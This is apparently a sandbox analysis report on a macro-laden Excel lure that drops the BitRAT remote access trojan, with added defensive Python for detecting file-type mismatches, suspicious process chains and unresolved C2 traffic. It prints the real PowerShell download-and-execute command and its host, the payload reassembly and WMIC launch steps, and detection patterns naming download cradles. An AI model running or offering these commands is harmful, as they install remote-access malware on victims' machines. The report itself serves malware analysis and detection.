
Analysis Report Scanned_25526662-Payment.xls

Overview

General Information

Sample Name: Scanned_25526662-Payment.xls
Analysis ID: 337288
MD5: cd7d4543958945e3fab4f0631e3494f3
SHA1: 3e00f26ab9384c9c1bb24eeb2de331f751f536ed
SHA256: b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
Tags: BitRAT, RAT, Strato, xls

Detection

Hidden Macro 4.0 BitRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected BitRAT
Contains functionality to create processes via WMI
Contains functionality to hide a thread from the debugger
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides threads from debuggers
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6560 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 6884 cmdline: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6940 cmdline: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • csc.exe (PID: 3868 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 3596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
        • cmd.exe (PID: 3144 cmdline: 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 6588 cmdline: 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • WMIC.exe (PID: 1636 cmdline: WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • Test3.jpg (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
    • Test3.jpg (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
  • cleanup
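
The `COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg` step in the tree above reassembles an executable from two innocuously named parts, and WMIC then launches the result despite its .jpg extension. The following Python is an added example, not part of the Joe Sandbox report or of the sample's own code: it reproduces the byte-level concatenation and implements the content-versus-extension check behind the "Drops files with a non-matching file extension" signature. The two parts are constructed stand-ins (a minimal DOS header and a minimal PE signature), not the real Test1.txt and Test2.gif.

```python
"""Content-versus-extension check for dropped files, plus the copy /B reassembly step.

Added example, not from the report. PART1/PART2 are constructed: together they
form the smallest byte sequence that passes an MZ + e_lfanew + "PE\0\0" check.
"""
import ntpath
import struct

# Constructed stand-ins for %TEMP%\Test1.txt and %TEMP%\Test2.gif.
# PART1: "MZ", 58 bytes of padding, then e_lfanew at offset 0x3c pointing to 0x40.
PART1 = b"MZ" + b"\x90" * 58 + struct.pack("<I", 0x40)
# PART2: the PE signature, Machine = 0x014c (x86), then a stub body.
PART2 = b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 250

MAGIC = {
    b"MZ":                "pe",
    b"GIF8":              "gif",
    b"\xff\xd8\xff":      "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xd0\xcf\x11\xe0":  "ole2",   # legacy .xls/.doc compound file
    b"PK\x03\x04":        "zip",    # also .xlsx/.docx
}
# Which sniffed types an extension may legitimately carry.
EXT_TYPES = {".exe": {"pe"}, ".dll": {"pe"}, ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
             ".gif": {"gif"}, ".png": {"png"}, ".txt": set(), ".xls": {"ole2"}, ".xlsx": {"zip"}}

def copy_b(*parts):
    """What `copy /B a + b c` does: plain byte concatenation, no transformation."""
    return b"".join(parts)

def sniff(data):
    """Identify content by magic bytes; for MZ, confirm the PE signature is reachable."""
    for magic, name in MAGIC.items():
        if not data.startswith(magic):
            continue
        if name == "pe":
            off = struct.unpack_from("<I", data, 0x3c)[0] if len(data) >= 0x40 else 0
            if len(data) < off + 4 or data[off:off + 4] != b"PE\x00\x00":
                return "mz-fragment"   # DOS header present, PE header missing: a split part
        return name
    return "unknown"

def extension(name):
    base = ntpath.basename(name)
    if "." not in base:
        return ""
    return "." + base.rsplit(".", 1)[1].lower()

def mismatch(name, data):
    """True when recognisable content (PE, image, archive, MZ fragment) does not
    match what the extension declares. Unknown content is not flagged."""
    kind = sniff(data)
    if kind == "unknown":
        return False
    return kind not in EXT_TYPES.get(extension(name), set())

def scan(dropped):
    """Return [(name, sniffed_type)] for every dropped file whose content and extension disagree."""
    return [(n, sniff(d)) for n, d in dropped.items() if mismatch(n, d)]

# Constructed drop set mirroring the three temp files in the process tree.
DROPPED = {
    "Test1.txt": PART1,
    "Test2.gif": PART2,
    "Test3.jpg": copy_b(PART1, PART2),
}

if __name__ == "__main__":
    for name, kind in scan(DROPPED):
        print(f"{name}: content looks like {kind}")
```

Note that Test2.gif on its own is invisible to a magic-based check: it starts with `PE\0\0`, which no common sniffer knows, so splitting a payload this way defeats naive drop-time scanning and only the reassembled file (or the MZ half) stands out.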

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Scanned_25526662-Payment.xls
  Rule: PowerShell_Case_Anomaly
  Description: Detects obfuscated PowerShell hacktools
  Author: Florian Roth
  Strings: 0x1d3ef:$s1: PoWErsHEll
Source: Scanned_25526662-Payment.xls
  Rule: JoeSecurity_XlsWithMacro4
  Description: Yara detected Xls With Macro 4.0
  Author: Joe Security

Dropped Files

Source: C:\Users\user\Desktop\1BA10000
  Rule: PowerShell_Case_Anomaly
  Description: Detects obfuscated PowerShell hacktools
  Author: Florian Roth
  Strings: 0x1cc71:$s1: PoWErsHEll

Memory Dumps

Source: Process Memory Space: Test3.jpg PID: 3180
  Rule: JoeSecurity_BitRAT
  Description: Yara detected BitRAT
  Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
  Source: Process started
  Author: Joe Security
  Data:
    Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    CommandLine|base64offset|contains: zw
    Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
    ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentProcessId: 6940
    ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    ProcessId: 3868

Sigma detected: Microsoft Office Product Spawning Windows Shell
  Source: Process started
  Author: Michael Haag, Florian Roth, Markus Neis
  Data:
    Command: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
    CommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
    CommandLine|base64offset|contains: (empty)
    Image: C:\Windows\SysWOW64\cmd.exe
    NewProcessName: C:\Windows\SysWOW64\cmd.exe
    OriginalFileName: C:\Windows\SysWOW64\cmd.exe
    ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    ParentProcessId: 6560
    ProcessCommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
    ProcessId: 6884

Sigma detected: Suspicious Csc.exe Source File Folder
  Source: Process started
  Author: Florian Roth
  Data:
    Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    CommandLine|base64offset|contains: zw
    Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
    ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentProcessId: 6940
    ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
    ProcessId: 3868
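
The Sigma hits above and the PowerShell_Case_Anomaly Yara hit all key on process-creation data (image, parent image, command line). The following Python is an added example, not the upstream Sigma or Yara rule text and not part of the report: it runs simplified versions of those checks, plus the WMIC and image-extension checks the process tree suggests, over a handful of events constructed from the Startup section. Field names follow Sysmon event 1 / Sigma `process_creation` conventions; the WMIC image path, the WmiPrvSE.exe parent for Test3.jpg and the benign control event are assumptions, since the report does not print them.

```python
"""Process-creation triage for the Excel -> cmd -> PowerShell -> csc / WMIC chain.

Added example (not the upstream Sigma/Yara rules, not part of the report).
EVENTS is constructed from the report's Startup section; field names follow
Sysmon event 1 / Sigma process_creation conventions.
"""
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "wmic.exe", "rundll32.exe", "regsvr32.exe"}
# Words whose casing is almost never mixed in legitimate command lines.
CASE_SENSITIVE_TOKENS = {"powershell", "cmd", "wmic", "mshta", "rundll32", "regsvr32",
                         "iex", "bypass", "curl", "iwr"}
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|users\\[^\\]+\\(desktop|downloads))\\", re.I)

def basename(path):
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip("'\"")).lower()

def case_anomaly(cmdline):
    """Return tokens such as PoWErsHEll or WmIC: a watched word written in a casing
    that is neither all-lower, all-upper nor Capitalised. Same idea as the
    PowerShell_Case_Anomaly Yara hit on the document, applied to the command line."""
    hits = []
    for tok in re.findall(r"[A-Za-z]+", cmdline):
        low = tok.lower()
        if low in CASE_SENSITIVE_TOKENS and tok not in (low, low.upper(), low.capitalize()):
            hits.append(tok)
    return hits

def evaluate(ev):
    """Return the names of every rule a single process-creation event matches."""
    img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    findings = []
    if parent in OFFICE_IMAGES and img in SHELL_IMAGES:
        findings.append("office_spawns_shell")          # cf. Office Product Spawning Windows Shell
    if case_anomaly(cmd):
        findings.append("lolbin_case_anomaly")
    if re.search(r"\biex\b.*\b(curl|iwr|wget|invoke-webrequest|downloadstring|downloadfile)\b", cmd, re.I):
        findings.append("powershell_download_cradle")   # IeX( cUrl ... ) pattern
    if re.search(r"-e(x|xec|xecutionpolicy|p)?\s+bypass", cmd, re.I):
        findings.append("execution_policy_bypass")
    if re.search(r"-w(indowstyle)?\s+(1|h(idden)?)\b", cmd, re.I):
        findings.append("hidden_window")
    if img == "csc.exe" and USER_WRITABLE.search(cmd):
        findings.append("csc_from_user_writable_path")  # cf. Suspicious Csc.exe Source File Folder
    if img == "wmic.exe" and re.search(r"process\s+call\s+create", cmd, re.I):
        findings.append("wmic_process_call_create")
    if re.search(r"\.(jpe?g|gif|png|txt)$", ev["Image"].strip("'\""), re.I):
        findings.append("exe_with_non_exe_extension")   # Test3.jpg started as a process
    return findings

def triage(events):
    """Map event index -> findings for every event that matched at least one rule."""
    out = {}
    for i, ev in enumerate(events):
        f = evaluate(ev)
        if f:
            out[i] = f
    return out

# Constructed from the report's process tree. The WMIC image path, the WmiPrvSE
# parent of Test3.jpg and the final benign control event are assumptions.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": "cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))"},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'"},
    {"Image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\Test3.jpg",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\Test3.jpg"},
    {"Image": r"C:\Windows\System32\cmd.exe",    # benign control: normal casing, Explorer parent
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for i, f in triage(EVENTS).items():
        print(i, basename(EVENTS[i]["Image"]), f)
```

The case check is deliberately narrow: it only fires on a short list of binaries and keywords, because arbitrary mixed case (file names, arguments) is common and would drown the signal. Combining it with the parent/child relationship is what turns a noisy string match into a usable alert.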

Signature Overview

AV Detection:

Antivirus detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Test1.txt | ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
  Source: Scanned_25526662-Payment.xls | Virustotal: Detection: 14%
  Source: Scanned_25526662-Payment.xls | ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Joe Sandbox ML: detected
  Source: C:\Users\user\AppData\Local\Temp\Test1.txt | Joe Sandbox ML: detected

Other signature details:
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,
  Source: Test3.jpg, 0000001B.00000002.361415384.00000000030E0000.00000040.00000001.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe

Networking:

  Source: global traffic | DNS query: name: lankarecipes.com
  Source: global traffic | TCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80 (2 occurrences)
  Source: global traffic | TCP traffic: 192.168.2.3:49734 -> 45.15.143.216:5210
  Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
  Source: global traffic | HTTP traffic detected:
    GET /Sparc.jpg HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: lankarecipes.com
    Connection: Keep-Alive
  Source: unknown | TCP traffic detected without corresponding DNS query: 45.15.143.216 (50 occurrences; the 5210/tcp peer is contacted by address only, the sole DNS query in the run is for lankarecipes.com)
  Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00415B0A WSARecv,
  Source: global traffic | HTTP traffic detected: GET /Sparc.jpg HTTP/1.1 (same request and headers as above)
  Source: unknown | DNS traffic detected: queries for: lankarecipes.com
  Source: PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.dr | String found in binary or memory: http://lankarecipes.com/Sparc.jp
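
The repeated "TCP traffic detected without corresponding DNS query" lines for 45.15.143.216 reflect a simple correlation: a connection to an address that no earlier DNS answer produced, made more suspicious here by the non-standard destination port 5210. The following Python is an added example, not from the report: it implements that correlation over a constructed event list based on the addresses above. The timestamps, the resolved address for lankarecipes.com (the report shows the query and the port-80 connection but not the answer record) and the second 5210/tcp connection are assumptions.

```python
"""Correlate TCP connections with prior DNS answers and flag unresolved peers
and non-standard ports. Added example, not part of the report; EVENTS is
constructed from the report's Networking section (timestamps assumed)."""
from ipaddress import ip_address

COMMON_PORTS = {80, 443, 53, 25, 110, 143, 465, 587, 993, 995, 8080, 8443}

# ("dns", ts, name, answer_ip)  or  ("tcp", ts, src, dst_ip, dst_port)
EVENTS = [
    ("dns", 1.0, "lankarecipes.com", "192.185.236.165"),
    ("tcp", 1.2, "192.168.2.3:49731", "192.185.236.165", 80),
    ("tcp", 1.3, "192.168.2.3:49731", "192.185.236.165", 80),
    ("tcp", 9.0, "192.168.2.3:49734", "45.15.143.216", 5210),
    ("tcp", 9.5, "192.168.2.3:49735", "45.15.143.216", 5210),   # assumed repeat connection
]

def correlate(events, window=300.0):
    """Return one finding per outbound connection to a public address that either
    had no DNS answer within `window` seconds before it, or uses an uncommon port."""
    resolved = {}   # answer_ip -> (name, ts of the answer)
    findings = []
    for ev in sorted(events, key=lambda e: e[1]):
        if ev[0] == "dns":
            resolved[ev[3]] = (ev[2], ev[1])
            continue
        _, ts, src, dst, dport = ev
        if ip_address(dst).is_private:      # LAN traffic is out of scope here
            continue
        f = {"ts": ts, "src": src, "dst": dst, "dport": dport, "reasons": []}
        answer = resolved.get(dst)
        if answer is None or ts - answer[1] > window:
            f["reasons"].append("no_prior_dns_answer")
        else:
            f["name"] = answer[0]
        if dport not in COMMON_PORTS:
            f["reasons"].append("non_standard_port")
        if f["reasons"]:
            findings.append(f)
    return findings

def summarize(findings):
    """Collapse per-connection findings to one row per (dst, port) with a count,
    which is what the report's fifty identical lines for 45.15.143.216 amount to."""
    out = {}
    for f in findings:
        key = (f["dst"], f["dport"])
        row = out.setdefault(key, {"count": 0, "reasons": set()})
        row["count"] += 1
        row["reasons"] |= set(f["reasons"])
    return out

if __name__ == "__main__":
    for (dst, port), row in summarize(correlate(EVENTS)).items():
        print(f"{dst}:{port}  x{row['count']}  {sorted(row['reasons'])}")
```

The DNS window matters in practice: a host that resolved a name an hour ago and reconnects from cache is legitimate, so the threshold should be tuned to the resolver's TTLs rather than set to "ever seen". Hard-coded IP addresses with no DNS at all, as with the 5210/tcp peer here, survive any window and are the strongest form of this signal.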
  Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | Strings found in binary or memory (Microsoft Office service endpoints written by EXCEL.EXE itself, not attacker infrastructure):
    • http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    • http://weather.service.msn.com/data.aspx
    • https://analysis.windows.net/powerbi/api
    • https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    • https://api.aadrm.com/
    • https://api.addins.omex.office.net/appinfo/query
    • https://api.addins.omex.office.net/appstate/query
    • https://api.cortana.ai
    • https://api.diagnostics.office.com
    • https://api.diagnosticssdf.office.com
    • https://api.microsoftstream.com/api/
    • https://api.office.net
    • https://api.onedrive.com
    • https://api.powerbi.com/beta/myorg/imports
    • https://api.powerbi.com/v1.0/myorg/datasets
    • https://api.powerbi.com/v1.0/myorg/groups
    • https://apis.live.net/v5.0/
    • https://arc.msn.com/v4/api/selection
    • https://asgsmsproxyapi.azurewebsites.net/
    • https://augloop.office.com
    • https://augloop.office.com/v2
    • https://autodiscover-s.outlook.com/
    • https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    • https://cdn.entity.
    • https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    • https://client-office365-tas.msedge.net/ab
    • https://clients.config.office.net/
    • https://clients.config.office.net/user/v1.0/android/policies
    • https://clients.config.office.net/user/v1.0/ios
    • https://clients.config.office.net/user/v1.0/mac
    • https://clients.config.office.net/user/v1.0/tenantassociationkey
    • https://cloudfiles.onenote.com/upload.aspx
    • https://config.edge.skype.com
    • https://config.edge.skype.com/config/v1/Office
    • https://config.edge.skype.com/config/v2/Office
    • https://contentstorage.omex.office.net/addinclassifier/officeentities
    • https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
    • https://cortana.ai
    • https://cortana.ai/api
    • https://cr.office.com
  Source: Test3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
  Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.dr | Strings found in binary or memory (continued):
    • https://dataservice.o365filtering.com
    • https://dataservice.o365filtering.com/
    • https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    • https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    • https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    • https://dev.cortana.ai
    • https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    • https://dev0-api.acompli.net/autodetect
    • https://devnull.onenote.com
    • https://directory.services.
    • https://ecs.office.com/config/v2/Office
    • https://entitlement.diagnostics.office.com
    • https://entitlement.diagnosticssdf.office.com
    • https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    • https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    • https://globaldisco.crm.dynamics.com
    • https://graph.ppe.windows.net
    • https://graph.ppe.windows.net/
    • https://graph.windows.net
    • https://graph.windows.net/
    • https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    • https://hubblecontent.osi.office.net/contentsvc/browse?
    • https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    • https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    • https://incidents.diagnostics.office.com
    • https://incidents.diagnosticssdf.office.com
    • https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    • https://insertmedia.bing.office.net/odc/insertmedia
    • https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    • https://lifecycle.office.com
    • https://login.microsoftonline.com/
    • https://login.windows-ppe.net/common/oauth2/authorize
    • https://login.windows.local
    • https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    • https://login.windows.net/common/oauth2/authorize
    • https://loki.delve.office.com/api/v1/configuration/officewin32/
    • https://lookup.onenote.com/lookup/geolocation/v1
    • https://management.azure.com
    • https://management.azure.com/
    • https://messaging.office.com/
    • https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    • https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    • https://ncus-000.contentsync.
    • https://ncus-000.pagecontentsync.
    • https://o365auditrealtimeingestion.manage.office.com
    • https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    • https://o365diagnosticsppe-web.cloudapp.net
    • https://ocos-office365-s2s.msedge.net/ab
    • https://ofcrecsvcapi-int.azurewebsites.net/
    • https://officeapps.live.com
    • https://officeci.azurewebsites.net/api/
    • https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    • https://officesetup.getmicrosoftkey.com
    • https://ogma.osi.office.net/TradukoApi/api/v1.0/
    • https://onedrive.live.com
    • https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    • https://onedrive.live.com/embed?
    • https://outlook.office.com/
    • https://outlook.office.com/autosuggest/api/v1/init?cvid=
    • https://outlook.office365.com/
    • https://outlook.office365.com/api/v1.0/me/Activities
    • https://outlook.office365.com/autodiscover/autodiscover.json
    • https://ovisualuiapp.azurewebsites.net/pbiagave/
